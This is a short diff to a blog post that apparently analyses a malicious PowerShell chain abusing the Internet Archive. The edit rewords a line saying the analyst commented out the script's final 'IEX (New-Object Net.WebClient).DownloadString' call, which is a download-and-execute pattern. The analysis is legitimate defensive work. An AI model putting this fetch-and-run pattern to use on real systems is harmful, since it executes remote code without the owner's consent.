qwertzy-antonio-godinho/qwertzy-antonio-godinho.github.io/_posts/2021-03-17-Abusing-Internet-Archive.md

 ![](../assets/Abusing-Internet-Archive/eset1-commented-2.png)

-I also commented the last command <span class="highlight-green">IEX (New-Object Net.WebClient).DownloadString</span>, as I previously had downloaded the file.
+As I had downloaded the files from the server, I commented the last command <span class="highlight-green">IEX (New-Object Net.WebClient).DownloadString</span>.

 The "atomic1.txt" file is another PowerShell script, a longer one than the one contained in the previous file.
 The top of the file: